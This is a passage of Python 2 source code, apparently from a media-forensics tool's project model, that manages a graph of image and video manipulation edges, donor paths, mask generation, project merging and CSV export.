self.notify((self.start, self.end), 'update_edge')
def update_node(self, node_properties):
deleteImage(self.getStartImageFile())
self.G.update_node(self.start, **node_properties)
def update_edge(self, mod):
"""
:param mod:
:return:
@type mod: Modification
"""
op = self.gopLoader.getOperationWithGroups(mod.operationName,fake=True)
mod_old = self.getModificationForEdge(self.start, self.end)
trigger_update = False
for k,v in mod.arguments.iteritems():
if (k not in mod_old.arguments or mod_old.arguments[k] != v) and \
k in op.getTriggerUpdateArguments():
trigger_update = True
for k in mod_old.arguments:
if k not in mod.arguments and \
k in op.getTriggerUpdateArguments():
trigger_update = True
self.G.update_edge(self.start, self.end,
op=mod.operationName,
description=mod.additionalInfo,
arguments={k: v for k, v in mod.arguments.iteritems() if k != 'inputmaskname'},
recordMaskInComposite=mod.recordMaskInComposite,
semanticGroups=mod.semanticGroups,
editable='no' if (
mod.software is not None and mod.software.internal) or mod.operationName == 'Donor' else 'yes',
softwareName=('' if mod.software is None else mod.software.name),
softwareVersion=('' if mod.software is None else mod.software.version),
inputmaskname=mod.inputMaskName)
self._save_group(mod.operationName)
if trigger_update:
self.reproduceMask(force=False)
else:
self.notify((self.start, self.end), 'update_edge')
def compare(self, destination, arguments={}):
""" Compare the 'start' image node to the image node with the name in the 'destination' parameter.
Return both images, the mask and the analysis results (a dictionary)
"""
return self.getLinkTool(self.start, destination).compare(self.start, destination, self, arguments=arguments)
def getMetaDiff(self):
""" Return the EXIF differences between nodes referenced by 'start' and 'end'
Return the Frame meta-data differences between nodes referenced by 'start' and 'end'
"""
e = self.G.get_edge(self.start, self.end)
if e is None:
return None
videodiff = VideoMetaDiff(e['metadatadiff']) if getValue(e,'metadatadiff',None) is not None else None
imagediff = MetaDiff(e['exifdiff']) if 'exifdiff' in e and len(e['exifdiff']) > 0 else None
return imagediff if imagediff is not None else videodiff
def getDonorAndBaseNodeTuples(self):
"""
        Return a tuple (edge, base node, list of nodes that form the path from edge to base)
for each valid donor path through the graph
"""
donorEdges = []
for edge_id in self.G.get_edges():
edge = self.G.get_edge(edge_id[0], edge_id[1])
if graph_rules.eligible_for_donor(edge):
donorEdges.append(edge_id)
results = []
for edge in donorEdges:
baseSet = self._findBaseNodesAndPaths(edge[0], excludeDonor=True)
for base in baseSet:
if (edge, base) not in results:
results.append((edge, base[0], base[1]))
if len(baseSet) == 0:
results.append((edge, None, list()))
for result in results:
result[2].reverse()
return results
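    # Illustrative use (not part of the original code): each result is (donor edge id, base node id,
    # path of node ids from the donor edge back to the base):
    #   for donor_edge, base_node, path in model.getDonorAndBaseNodeTuples():
    #       ...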
def getTerminalAndBaseNodeTuples(self):
"""
Return a tuple (lead node, base node) for each valid (non-donor) path through the graph
"""
terminalNodes = [node for node in self.G.get_nodes() if
len(self.G.successors(node)) == 0 and len(self.G.predecessors(node)) > 0]
return [(node, self._findBaseNodes(node)) for node in terminalNodes]
def getEdges(self, endNode,excludeDonor=True):
"""
:param endNode: (identifier)
:return: tuple (start, end, edge map) for all edges ending in endNode
"""
return self._findEdgesWithCycleDetection(endNode, excludeDonor=excludeDonor, visitSet=list())
def getNodeNames(self):
return self.G.get_nodes()
def getCurrentNode(self):
return self.G.get_node(self.start)
def isEditableEdge(self, start, end):
e = self.G.get_edge(start, end)
return 'editable' not in e or e['editable'] == 'yes'
def findChild(self, parent, child):
for suc in self.G.successors(parent):
if suc == child or self.findChild(suc, child):
return True
return False
def compress(self, all=False,force=False):
if all:
return [self._compress(node) for node in self.G.get_nodes()]
else:
return self._compress(self.start, force=force)
def _compress(self, start, force=False):
defaults = {'compressor.video': 'maskgen.video_tools.x264',
'compressor.audio': None,
'compressor.image': None}
node = self.G.get_node(start)
ftype = self.getNodeFileType(start)
# cannot finish the action since the edge analysis was skipped
for skipped_edge in self.G.getDataItem('skipped_edges', []):
if skipped_edge['start'] == start and not force:
return
if (len(self.G.successors(start)) == 0 or len(self.G.predecessors(start)) == 0) and not force:
return
props = {'remove_video': False,'force': False}
#for pred in self.G.predecessors(start):
# edge = self.G.get_edge(pred, start)
# op = getOperationWithGroups(edge['op'], fake=True)
# if op.category == 'Audio':
# props['remove_video'] = True
compressor = prefLoader.get_key('compressor.' + ftype,
default_value=defaults['compressor.' + ftype])
if 'compressed' in node:
return
func = getRule(compressor)
newfile = None
if func is not None:
newfilename = func(os.path.join(self.get_dir(), node['file']), **props)
if newfilename is not None:
newfile = os.path.split(newfilename)[1]
self.G.update_node(start,file=newfile,compressed=compressor)
return newfile
def connect(self, destination, mod=Modification('Donor', '',category='Donor'), invert=False, sendNotifications=True,
skipDonorAnalysis=False):
""" Given a image node name, connect the new node to the end of the currently selected node.
Create the mask, inverting the mask if requested.
Send a notification to the register caller if requested.
Return an error message on failure, otherwise return None
"""
if self.start is None:
return ValidationMessage(Severity.ERROR,
self.start,
self.end,
Message="Node node selected",
Module=''), False
elif not self.G.has_node(destination):
return ValidationMessage(Severity.ERROR,
self.start,
self.end,
Message="Canvas out of state from model. Node Missing.",
Module=''), False
elif self.findChild(destination, self.start):
return ValidationMessage(Severity.ERROR,
self.start,
self.end,
Message="Cannot connect to ancestor node",
Module=''), False
else:
for successor in self.G.successors(self.start):
if successor == destination:
return ValidationMessage(Severity.ERROR,
self.start,
self.end,
Message="Cannot connect to the same node twice",
Module=''), False
return self._connectNextImage(destination,
mod,
invert=invert,
sendNotifications=sendNotifications,
skipDonorAnalysis=skipDonorAnalysis)
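    # Illustrative call (not part of the original code), assuming 'donor_node' is an existing node id
    # and self.start is already set:
    #   message, ok = model.connect('donor_node')
    # 'message' carries validation errors (or None) and 'ok' indicates whether the link was created.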
def getPredecessorNode(self):
if self.end is None:
for pred in self.G.predecessors(self.start):
edge = self.G.get_edge(pred, self.start)
if edge['op'] != 'Donor':
return pred
return self.start
def getBaseNode(self, node):
for pred in self.G.predecessors(node):
edge = self.G.get_edge(pred, node)
if edge['op'] != 'Donor':
return self.getBaseNode(pred)
return node
def getCreatingOperation(self, destination):
"""
:return: operation for the manipulation that created this destination and the start node
@rtype: (str,Operation)
"""
predecessors = self.G.predecessors(destination)
for pred in predecessors:
pred_edge = self.G.get_edge(pred, destination)
edge_op = self.gopLoader.getOperationWithGroups(pred_edge['op'])
if edge_op is not None and pred_edge['op'] != 'Donor':
return pred, edge_op
def getDonorAndBaseImage(self):
"""
Get the donor image and associated baseImage for the selected node.
"""
nodeName = self.start if self.end is None else self.end
# verify the node is a leaf node
endPointTuples = self.getDonorAndBaseNodeTuples()
for x in endPointTuples:
if nodeName == x[0][1]:
baseImage, _ = self.G.get_image(x[1])
donors = self.constructDonors()
for donortuple in donors:
if donortuple.base == x[1]:
if donortuple.media_type == 'video':
return video_tools.getSingleFrameFromMask(donortuple.mask_wrapper), baseImage
elif donortuple.media_type == 'audio':
return None, None
else:
return donortuple.mask_wrapper, baseImage
return None, None
def getTransformedMask(self):
"""
:return: list of CompositeImage
"""
composite_generator = mask_rules.prepareComposite((self.start, self.end),self.G, self.gopLoader, self.probeMaskMemory)
return composite_generator.constructComposites(checkEmptyMask=False)
def executeFinalNodeRules(self):
terminalNodes = [node for node in self.G.get_nodes() if
len(self.G.successors(node)) == 0 and len(self.G.predecessors(node)) > 0]
for node in terminalNodes:
graph_rules.setFinalNodeProperties(self, node)
def constructDonors(self):
"""
Construct donor images
Find all valid base node, leaf node tuples
:return computed donors in the form of tuples
(image node id donated to, base image node, ImageWrapper mask, filename)
@rtype list of DonorImage
"""
self._executeSkippedComparisons()
for edge_id in self.G.get_edges():
if self.start is not None and self.start != edge_id[1]:
continue
composite_generator = mask_rules.prepareComposite(edge_id, self.G, self.gopLoader, self.probeMaskMemory)
return composite_generator.constructDonors(saveImage=False)
return []
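    # Note (descriptive, not part of the original code): when self.start is set, donor construction is
    # limited to an edge ending at that node; the composite generator returns DonorImage tuples whose
    # mask images are not written to disk here (saveImage=False).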
def invertInputMask(self):
"""
Temporary: Add missing input masks
:return:
"""
if self.start is not None and self.end is not None:
start_im = self.startImage()
edge = self.G.get_edge(self.start, self.end)
if edge is not None:
maskname= getValue(edge,'inputmaskname')
if maskname is not None:
mask = openImageMaskFile(self.get_dir(),maskname)
if mask is not None:
expected_shape = start_im.image_array.shape[0:2]
if expected_shape != mask.shape:
mask = cv2.resize(mask,tuple(reversed(expected_shape)))
mask = ImageWrapper(mask)
mask = mask.invert()
mask.save(os.path.join(self.get_dir(),maskname))
def fixInputMasks(self):
"""
Temporary: Add missing input masks
:return:
"""
for edge_id in self.G.get_edges():
edge = self.G.get_edge(edge_id[0], edge_id[1])
if graph_rules.missing_donor_inputmask(edge, self.G.dir):
startimage, name = self.G.get_image(edge_id[0])
finalimage, fname = self.G.get_image(edge_id[1])
mask = self.G.get_edge_image(edge_id[0], edge_id[1], 'maskname')
inputmaskname = os.path.splitext(name)[0]+ '_inputmask.png'
ImageWrapper(composeCloneMask(mask, startimage, finalimage)).save(inputmaskname)
# if 'arguments' not in edge:
# edge['arguments'] = {}
edge['inputmaskname'] = os.path.split(inputmaskname)[1]
# edge['arguments']['inputmaskname'] = os.path.split(inputmaskname)[1]
self.G.setDataItem('autopastecloneinputmask', 'yes')
def renametobase(self):
"""
Rename the project to match the name of the base image
:return:
"""
for nodeid in self.G.get_nodes():
node = self.G.get_node(nodeid)
if 'nodetype' in node and node['nodetype'] == 'base':
pos = node['file'].find('.')
self.getGraph().set_name(node['file'][:pos] if pos > 0 else node['file'])
break
def addNextImage(self, pathname, invert=False, mod=Modification('', ''), sendNotifications=True, position=(50, 50),
skipRules=False, edge_parameters={}, node_parameters={}):
""" Given a image file name and PIL Image, add the image to the project, copying into the project directory if necessary.
Connect the new image node to the end of the currently selected edge. A node is selected, not an edge, then connect
to the currently selected node. Create the mask, inverting the mask if requested.
Send a notification to the register caller if requested.
Return a list of validation messages on failure, otherwise return None
"""
if (self.end is not None):
self.start = self.end
params = dict(node_parameters)
params['xpos'] = position[0]
params['ypos'] = position[1]
params['nodetype'] = 'base'
for k, v in self.getAddTool(pathname).getAdditionalMetaData(pathname).iteritems():
params[k] = v
destination = self.G.add_node(pathname, seriesname=self.getSeriesName(), **params)
self.notify([destination],'add')
analysis_params = dict({ k:v for k,v in edge_parameters.iteritems() if v is not None})
msgs, status = self._connectNextImage(destination, mod, invert=invert, sendNotifications=sendNotifications,
skipRules=skipRules, analysis_params=analysis_params)
return msgs, status
def getLinkType(self, start, end):
return self.getNodeFileType(start) + '.' + self.getNodeFileType(end)
def getLinkTool(self, start, end):
"""
:param start:
:param end:
:return:
@rtype: LinkTool
"""
return linkTools[self.getLinkType(start, end)]
def mergeProject(self, project):
"""
Merge projects. Does not support updating edges or nodes.
Instead, it only adds new edges and nodes.
Should be used with caution.
:param project:
:return:
@type project: ImageProjectModel
"""
# link from their node id to my node id
merge_point = dict()
myfiles = dict()
matches = dict()
for nodeid in self.getGraph().get_nodes():
mynode = self.getGraph().get_node(nodeid)
md5 = md5_of_file(os.path.join(self.G.dir, mynode['file']),
raiseError=False)
matches[md5] = nodeid
self.G.update_node(nodeid, file=md5)
for nodeid in project.getGraph().get_nodes():
theirnode = project.getGraph().get_node(nodeid)
theirfilemd5 = md5_of_file(os.path.join(project.get_dir(), theirnode['file']),
raiseError=False)
if theirnode['file'] in myfiles:
if myfiles[theirnode['file']] != theirfilemd5:
logging.getLogger('maskgen').warn(
'file {} is in both projects but MD5 is different'.format(theirnode['file']))
if theirfilemd5 in matches:
merge_point[nodeid] = matches[theirfilemd5]
if len(merge_point) == 0:
return 'No merge points found'
for nodeid in project.getGraph().get_nodes():
theirnode = project.getGraph().get_node(nodeid)
if nodeid not in merge_point:
merge_point[nodeid] = self.getGraph().add_node(os.path.join(project.get_dir(), theirnode['file']),
**theirnode)
for start, end in project.getGraph().get_edges():
mystart = merge_point[start]
myend = merge_point[end]
edge = self.getGraph().get_edge(mystart, myend)
if edge is None:
self.getGraph().copy_edge(mystart,
myend,
dir=project.get_dir(),
edge=project.getGraph().get_edge(start, end))
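    # Note (descriptive, not part of the original code): merge points are discovered by matching the
    # MD5 of node files in both projects; unmatched nodes and missing edges from the other project are
    # then copied in, while existing nodes and edges are left untouched.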
def getAddTool(self, media):
""""
:param media:
:return:
@rtype : AddTool
"""
ft = fileType(media)
if ft.startswith('zip'):
ft = 'zip'
return addTools[ft]
def hasSkippedEdges(self):
return len(self.G.getDataItem('skipped_edges', [])) > 0
def _executeQueue(self,q,results,tracker):
from Queue import Empty
"""
:param q:
:return:
@type q : Queue
@type failures: Queue
"""
while not q.empty():
try:
edge_data = q.get_nowait()
if edge_data is None:
break
logging.getLogger('maskgen').info('Recomputing mask for edge {} to {} using operation {}'.format(
edge_data['start'],
edge_data['end'],
edge_data['opName']
))
tracker.next('{}->{}'.format(edge_data['start'], edge_data['end']))
if self.getGraph().has_node(edge_data['start']) and self.getGraph().has_node(edge_data['end']) and \
self.getGraph().has_edge(edge_data['start'],edge_data['end']):
mask, analysis, errors = self.getLinkTool(edge_data['start'], edge_data['end']).compareImages(
edge_data['start'],
edge_data['end'],
self,
edge_data['opName'],
arguments=edge_data['arguments'],
skipDonorAnalysis=edge_data['skipDonorAnalysis'],
invert=edge_data['invert'],
analysis_params=edge_data['analysis_params'])
maskname = shortenName(edge_data['start'] + '_' + edge_data['end'], '_mask.png', identifier=self.G.nextId())
self.G.update_mask(edge_data['start'], edge_data['end'], mask=mask, maskname=maskname, errors=errors,
**consolidate(analysis, edge_data['analysis_params']))
else:
errors = []
results.put(((edge_data['start'], edge_data['end']), True, errors))
#with self.G.lock:
# results.put(((edge_data['start'], edge_data['end']), True, errors))
# self.G.setDataItem('skipped_edges', [skip_data for skip_data in self.G.getDataItem('skipped_edges', []) if
# (skip_data['start'], skip_data['end']) != (edge_data['start'], edge_data['end'])])
except Empty:
break
except Exception as e:
if edge_data is not None:
logging.getLogger('maskgen').error('Failure to generate mask for edge {} to {} using operation {}: {}'.format(
edge_data['start'],
edge_data['end'],
edge_data['opName'],
str(e)
))
results.put(((edge_data['start'], edge_data['end']),False, [str(e)]))
return
def _executeSkippedComparisons(self,status_cb=None):
from Queue import Queue
from threading import Thread
allErrors = []
completed = []
q = Queue()
status = Queue()
results = Queue()
skipped_edges = self.G.getDataItem('skipped_edges', [])
if len(skipped_edges) == 0:
return
        skipped_threads = prefLoader.get_key('skipped_threads', 2)
        # forward status messages through the queue only when running multi-threaded with a callback
        tracker_cb = (lambda x: status.put(x)) if status_cb is not None and int(skipped_threads) >= 2 else None
        tracker = StatusTracker(module_name='Mask Generator',
                                amount=len(skipped_edges),
                                status_cb=tracker_cb)
        for edge_data in skipped_edges:
            q.put(edge_data)
logging.getLogger('maskgen').info('Recomputing {} masks with {} threads'.format(q.qsize(), skipped_threads))
threads = list()
try:
if int(skipped_threads) < 2:
self._executeQueue(q, results, tracker)
else:
for i in range(int(skipped_threads)):
t = Thread(target=self._executeQueue, name='skipped_edges' + str(i), args=(q,results,tracker))
threads.append(t)
t.start()
if status_cb is not None:
while not q.empty():
try:
message = status.get(timeout=5)
if message is not None:
status_cb(message)
except:
continue
for thread in threads:
thread.join()
while not results.empty():
result = results.get_nowait()
allErrors.extend(result[2])
if result[1]:
completed.append(result[0])
finally:
tracker.complete()
self.G.setDataItem('skipped_edges',[edge_data for edge_data in skipped_edges if (edge_data['start'], edge_data['end']) not in completed])
msg = os.linesep.join(allErrors).strip()
return msg if len(msg) > 0 else None
def _compareImages(self, start, destination, opName, invert=False, arguments={}, skipDonorAnalysis=False,
analysis_params=dict(),
force=False):
if prefLoader.get_key('skip_compare') and not force:
self.G.setDataItem('skipped_edges', self.G.getDataItem('skipped_edges', list()) + [{"start": start,
"end": destination,
"analysis_params": analysis_params,
"arguments": arguments,
"opName": opName,
"skipDonorAnalysis": skipDonorAnalysis,
"invert": invert
}])
return None, {}, []
try:
for k, v in self.gopLoader.getOperationWithGroups(opName).compareparameters.iteritems():
arguments[k] = v
except:
pass
return self.getLinkTool(start, destination).compareImages(start, destination, self, opName,
arguments=arguments,
skipDonorAnalysis=skipDonorAnalysis,
invert=invert,
analysis_params=analysis_params)
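    # Note (descriptive, not part of the original code): when the 'skip_compare' preference is set and
    # force is False, the comparison is queued under the graph data item 'skipped_edges' and resolved
    # later by _executeSkippedComparisons(), which recomputes the masks in worker threads.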
def reproduceMask(self, skipDonorAnalysis=False,edge_id=None, analysis_params=dict(), argument_params=dict(),
force=True):
"""
:param skipDonorAnalysis:
:param edge_id:
:param analysis_params:
:param argument_params:
:param force: If True, then force mask creation do not skip.
:return:
"""
errors = []
mask_edge_id = (self.start, self.end) if edge_id is None else edge_id
edge = self.G.get_edge(mask_edge_id[0],mask_edge_id[1])
arguments = dict(edge['arguments']) if 'arguments' in edge else dict()
if len(argument_params) > 0:
arguments = argument_params
if 'inputmaskname' in edge and edge['inputmaskname'] is not None:
arguments['inputmaskname'] = edge['inputmaskname']
try:
mask, analysis, errors = self._compareImages(mask_edge_id[0], mask_edge_id[1], edge['op'],
arguments=arguments,
skipDonorAnalysis=skipDonorAnalysis,
analysis_params=analysis_params,
force=force)
analysis_params['arguments'] = arguments
maskname = shortenName(mask_edge_id[0] + '_' + mask_edge_id[1], '_mask.png', identifier=self.G.nextId())
self.G.update_mask(mask_edge_id[0], mask_edge_id[1], mask=mask, maskname=maskname, errors=errors, **consolidate(analysis, analysis_params))
if len(errors) == 0:
self.G.setDataItem('skipped_edges', [skip_data for skip_data in self.G.getDataItem('skipped_edges', []) if
(skip_data['start'], skip_data['end']) != mask_edge_id])
self.notify(mask_edge_id, 'update_edge')
except video_tools.MaskGenerationError as e:
if e.message != '':
logging.getLogger('maskgen').info(e.message)
return errors
def _connectNextImage(self, destination, mod, invert=False, sendNotifications=True, skipRules=False,
skipDonorAnalysis=False,
analysis_params={}):
"""
:param destination:
:param mod:
:param invert:
:param sendNotifications:
:param skipRules:
:param skipDonorAnalysis:
:param analysis_params:
:return: Error message and success or failure
@rtype: (str, bool)
"""
try:
maskname = shortenName(self.start + '_' + destination, '_mask.png', identifier=self.G.nextId())
if mod.inputMaskName is not None:
mod.arguments['inputmaskname'] = mod.inputMaskName
mask, analysis, errors = self._compareImages(self.start, destination, mod.operationName,
invert=invert, arguments=mod.arguments,
skipDonorAnalysis=skipDonorAnalysis,
analysis_params=analysis_params)
self.end = destination
if errors:
mod.errors = errors
for k, v in analysis_params.iteritems():
if k not in analysis:
analysis[k] = v
if 'recordMaskInComposite' in mod.arguments:
mod.recordMaskInComposite = mod.arguments.pop('recordMaskInComposite')
            # force the mask into the composite when the analysis marks the change as local (not global)
            mod.recordMaskInComposite = 'yes' if getValue(analysis, 'global', 'yes') == 'no' else mod.recordMaskInComposite
self.__addEdge(self.start, self.end, mask, maskname, mod, analysis)
if sendNotifications:
self.notify((self.start, destination), 'connect')
logging.getLogger('maskgen').debug('Validation')
edgeErrors = [] if skipRules else self.validator.run_edge_rules(self.G, self.start, destination, isolated=True)
edgeErrors = edgeErrors if len(edgeErrors) > 0 else None
self.labelNodes(self.start)
self.labelNodes(destination)
return edgeErrors, True
except Exception as e:
exc_type, exc_value, exc_traceback = sys.exc_info()
logging.getLogger('maskgen').error(' '.join(traceback.format_exception(exc_type,exc_value,exc_traceback)))
return [ValidationMessage(Severity.ERROR,
self.start,
destination,
'Exception (' + str(e) + ')',
'Change Mask',
None)], False
def __scan_args_callback(self, opName, arguments):
"""
Call back function for image graph's arg_checker_callback.
Add any discovered arguments that are associated with
file paths so that the image graph can managed the file
existence and archiving
:param opName:
:param arguments:
:return:
"""
if len(arguments) > 0 and opName != 'node':
self.__addEdgeFilePaths(self.gopLoader.getOperationWithGroups(opName, fake=True))
def __addEdgeFilePaths(self, op):
for k, v in op.mandatoryparameters.iteritems():
if k == 'inputmaskname':
continue
if v['type'].startswith('fileset:') or v['type'].startswith('file:'):
self.G.addEdgeFilePath('arguments.' + k, '')
for k, v in op.optionalparameters.iteritems():
if k == 'inputmaskname':
continue
if v['type'].startswith('fileset:') or v['type'].startswith('file:'):
self.G.addEdgeFilePath('arguments.' + k, '')
def __addEdge(self, start, end, mask, maskname, mod, additionalParameters):
if len(mod.arguments) > 0:
additionalParameters['arguments'] = {k: v for k, v in mod.arguments.iteritems() if k != 'inputmaskname'}
self.G.add_edge(start, end,
mask=mask,
maskname=maskname,
op=mod.operationName,
description=mod.additionalInfo,
recordMaskInComposite=mod.recordMaskInComposite,
editable='no' if (
mod.software is not None and mod.software.internal) or mod.operationName == 'Donor' else 'yes',
softwareName=('' if mod.software is None else mod.software.name),
softwareVersion=('' if mod.software is None else mod.software.version),
inputmaskname=mod.inputMaskName,
automated=mod.automated,
semanticGroups=mod.semanticGroups,
errors=mod.errors,
**additionalParameters)
self._save_group(mod.operationName)
def _save_group(self, operation_name):
op = self.gopLoader.getOperationWithGroups(operation_name, fake=True)
if op.groupedOperations is not None and len(op.groupedOperations) > 0:
groups = self.G.getDataItem('groups')
if groups is None:
groups = dict()
groups[operation_name] = op.groupedOperations
self.G.setDataItem('groups', groups, excludeUpdate=True)
def getSeriesName(self):
""" A Series is the prefix of the first image node """
if self.start is None:
return None
startNode = self.G.get_node(self.start)
prefix = None
if (startNode.has_key('seriesname')):
prefix = startNode['seriesname']
if (self.end is not None):
endNode = self.G.get_node(self.end)
if (endNode.has_key('seriesname')):
                prefix = endNode['seriesname']
return prefix
def nodesToCSV(self, filename, additionalpaths=list(), nodeFilter=None):
"""
Create a CSV containing all the nodes of the graph.
        By default, the first columns are project name, node id,
        node type, file type, and file name.
        :param filename:
        :param additionalpaths: paths that describe nested keys within the node dictionary identifying
        those keys' value to be placed as columns in the CSV
        :param nodeFilter: a function that accepts the node dictionary and returns True if
        the node is to be included in the CSV file. If the nodeFilter is None or not provided,
        all nodes are included in the CSV file
        :return: None
        @type filename: str
        @type nodeFilter: func
"""
import csv
csv.register_dialect('unixpwd', delimiter=',', quoting=csv.QUOTE_MINIMAL)
with open(filename, "ab") as fp:
fp_writer = csv.writer(fp)
for node_id in self.G.get_nodes():
node = self.G.get_node(node_id)
if nodeFilter is not None and not nodeFilter(node):
continue
row = [self.G.get_name(), node_id, node['nodetype'], self.G.getNodeFileType(node_id), self.G.get_filename(node_id)]
for path in additionalpaths:
                    if isinstance(path, str):
values = getPathValues(node, path)
else:
values = path(node)
if len(values) > 0:
row.append(values[0])
else:
row.append('')
fp_writer.writerow(row)
def toCSV(self, filename, additionalpaths=list(), edgeFilter=None):
"""
Create a CSV containing all the edges of the graph.
By default, the first columns are project name, edge start node id,
edge end node id, and edge operation.
:param filename:
:param additionalpaths: paths that describe nested keys within the edge dictionary identifying
those keys' value to be placed as columns in the CSV
:param edgeFilter: a function that accepts the edge dictionary and returns True if
the edge is to be included in the CSV file. If the edgeFilter is None or not provided,
all edges are included in the CSV file
:return: None
@type filename: str
@type edgeFilter: func
"""
import csv
import inspect
from functools import partial
csv.register_dialect('unixpwd', delimiter=',', quoting=csv.QUOTE_MINIMAL)
with open(filename, "ab") as fp:
fp_writer = csv.writer(fp)
for edge_id in self.G.get_edges():
edge = self.G.get_edge(edge_id[0], edge_id[1])
if edgeFilter is not None and not edgeFilter(edge):
continue
row = [self.G.get_name(), edge_id[0], edge_id[1], edge['op']]
baseNodes = self._findBaseNodes(edge_id[0])
for path in additionalpaths:
if path == 'basenode':
row.append(baseNodes[0])
continue
                    elif isinstance(path, str):
values = getPathValues(edge, path)
elif (inspect.isfunction(path) and 'graph' in inspect.getargspec(path).args) or \
(isinstance(path, partial) and 'graph' in inspect.getargspec(path.func).args):
values = path(edge, edge_id=edge_id, op=self.gopLoader.getOperationWithGroups(edge['op']),
graph=self.getGraph())
else:
values = path(edge, edge_id=edge_id, op=self.gopLoader.getOperationWithGroups(edge['op']))
if len(values) > 0:
row.append(values[0])
else:
row.append('')
fp_writer.writerow(row)
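    # Hedged usage sketch (illustration only; not part of the original module).
    # Assumes `model` is an already-loaded project model; '/tmp/edges.csv' and the
    # 'arguments.purpose' key path are hypothetical. Column extractors may be plain
    # key paths into the edge dictionary, the special 'basenode' marker, or callables
    # that accept the edge plus edge_id/op keyword arguments and return a list.
    #
    #   model.toCSV('/tmp/edges.csv',
    #               additionalpaths=['basenode',
    #                                'arguments.purpose',
    #                                lambda edge, edge_id=None, op=None: [op.category]],
    #               edgeFilter=lambda edge: edge['op'] != 'Donor')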
def getName(self):
return self.G.get_name()
def operationImageName(self):
return self.end if self.end is not None else self.start
def getFileName(self, nodeid):
return self.G.get_node(nodeid)['file']
def startImageName(self):
return self.G.get_node(self.start)['file'] if self.start is not None else ""
def nextImageName(self):
return self.G.get_node(self.end)['file'] if self.end is not None else ""
def nextId(self):
return self.end
def undo(self):
""" Undo the last graph edit """
s = self.start
e = self.end
self.start = None
self.end = None
self.G.undo()
self.notify((s, e), 'undo')
def select(self, edge):
if self.getGraph().get_node(edge[0]) == None:
return False
self.start = edge[0]
self.end = edge[1]
return True
def _openProject(self, projectFileName, projecttype, username=None,tool=None):
return createGraph(projectFileName,
projecttype=projecttype,
arg_checker_callback=self.__scan_args_callback,
edgeFilePaths={'inputmaskname': 'inputmaskownership',
'selectmasks.mask': '',
'videomasks.videosegment': '',
'substitute subsitute': '',
'substitute videomasks.videosegment': ''},
nodeFilePaths={'donors.*': ''},
username=username if username is not None else self.username,
tool=tool)
def _autocorrect(self):
if not updateJournal(self):
logging.getLogger('maskgen').error('Cannot auto update journal')
def _setup(self, projectFileName, graph=None, baseImageFileName=None,tool=None):
projecttype = None if baseImageFileName is None else fileType(baseImageFileName)
self.G = self._openProject(projectFileName, projecttype, username=self.username,tool=tool) if graph is None else graph
self._autocorrect()
self.start = None
self.end = None
n = self.G.get_nodes()
if len(n) > 0:
self.start = n[0]
s = self.G.successors(n[0])
if len(s) > 0:
self.end = s[0]
else:
p = self.G.predecessors(n[0])
if len(p) > 0:
self.start = p[0]
self.end = n[0]
# inject loaded groups into the group operations manager
for group, ops in self.G.getDataItem('groups', default_value={}).iteritems():
self.gopLoader.injectGroup(group, ops)
self.validator = Validator(prefLoader, self.gopLoader)
def getStartType(self):
return self.G.getNodeFileType(self.start) if self.start is not None else 'image'
def getEndType(self):
return self.G.getNodeFileType(self.end) if self.end is not None else 'image'
def getNodeFileType(self, nodeid):
return self.G.getNodeFileType(nodeid)
def saveas(self, pathname):
with self.lock:
self.clear_validation_properties()
self.assignColors()
self.G.saveas(pathname)
def save(self):
with self.lock:
self.clear_validation_properties()
self.assignColors()
self.setProjectSummary()
self.G.save()
def getEdgeItem(self, name, default=None):
edge = self.G.get_edge(self.start, self.end)
return edge[name] if name in edge else default
def getDescriptionForPredecessor(self, node):
for pred in self.G.predecessors(node):
edge = self.G.get_edge(pred, node)
if edge['op'] != 'Donor':
return self.getModificationForEdge(pred, node)
return None
def getCurrentEdgeModification(self):
if self.start is None or self.end is None:
return None
return self.getModificationForEdge(self.start, self.end)
def findPaths(self,node, condition):
"""
Return a list of a tuple. The first item is the full path in reverse order
from final node to current node. The second item is a boolean indicating if the path
meets the condition.
:param node:
:param condition:
:return:
@rtype: list of (list,bool)
"""
successors = self.G.successors(node)
if len(successors) == 0:
return [([node],False)]
else:
paths=[]
for successsor in successors:
for path in self.findPaths(successsor, condition):
paths.append(path)
paths = [(path[0]+[node], condition(node, path[0][-1]) | path[1]) for path in paths]
return paths
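    # Hedged usage sketch (illustration only). The condition callable receives the
    # current node and the adjacent node already on the (reversed) path and returns a
    # boolean; each result pairs a final-to-start path with a flag indicating whether
    # the condition held anywhere along it. The node id 'base_node_id' is hypothetical.
    #
    #   donor_paths = model.findPaths('base_node_id',
    #                                 lambda start, end: model.isDonorEdge(start, end))
    #   reached_through_donor = [path for path, hit in donor_paths if hit]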
def findEdgePaths(self,node):
"""
Return a list of a tuple. The first item is the full path in reverse order
from final node to current node. The second item is a boolean indicating if the path
meets the condition.
:param node:
:param condition:
:return:
@rtype: list of (list,bool)
"""
successors = self.G.successors(node)
if len(successors) == 0:
return [[]]
else:
paths=[]
for successsor in successors:
for path in self.findEdgePaths(successsor):
paths.append(path)
paths = [path+[(node, successsor)] for path in paths]
return paths
def getImage(self, name):
if name is None or name == '':
return ImageWrapper(np.zeros((250, 250, 4)).astype('uint8'))
return self.G.get_image(name)[0]
def getImageAndName(self, name, arguments=dict()):
"""
:param name:
:param arguments:
:return:
@rtype (ImageWrapper,str)
"""
if name is None or name == '':
return ImageWrapper(np.zeros((250, 250, 4)).astype('uint8')),''
return self.G.get_image(name, metadata=arguments)
def getStartImageFile(self):
return os.path.join(self.G.dir, self.G.get_node(self.start)['file'])
def getProxy(self):
return getValue(self.G.get_node(self.start),'proxyfile')
def setProxy(self, filename):
if filename is None:
if self.getProxy() is not None:
self.G.get_node(self.start).pop('proxyfile')
return
self.G.update_node(self.start,proxyfile=os.path.basename(filename))
def getNextImageFile(self):
return os.path.join(self.G.dir, self.G.get_node(self.end)['file'])
def startImage(self):
return self.getImage(self.start)
def nextImage(self):
if self.end is None:
dim = (250, 250) if self.start is None else self.getImage(self.start).size
return ImageWrapper(np.zeros((dim[1], dim[0])).astype('uint8'))
return self.getImage(self.end)
def updateSelectMask(self, selectMasks):
if self.end is None:
return
sms = []
for k, v in selectMasks.iteritems():
if v is not None:
sms.append({'mask': v[0], 'node': k})
self.G.update_edge(self.start, self.end, selectmasks=sms)
def getSelectMasks(self):
"""
        A selectMask is a mask that is used in composite mask production, overriding the default link mask
"""
if self.end is None:
return {}
edge = self.G.get_edge(self.start, self.end)
terminals = self._findTerminalNodes(self.end, excludeDonor=True,
includeOps=['Recapture', 'TransformWarp', 'TransformContentAwareScale',
'TransformDistort', 'TransformSkew', 'TransformSeamCarving'])
images = edge['selectmasks'] if 'selectmasks' in edge else []
sms = {}
for image in images:
if image['node'] in terminals:
sms[image['node']] = (
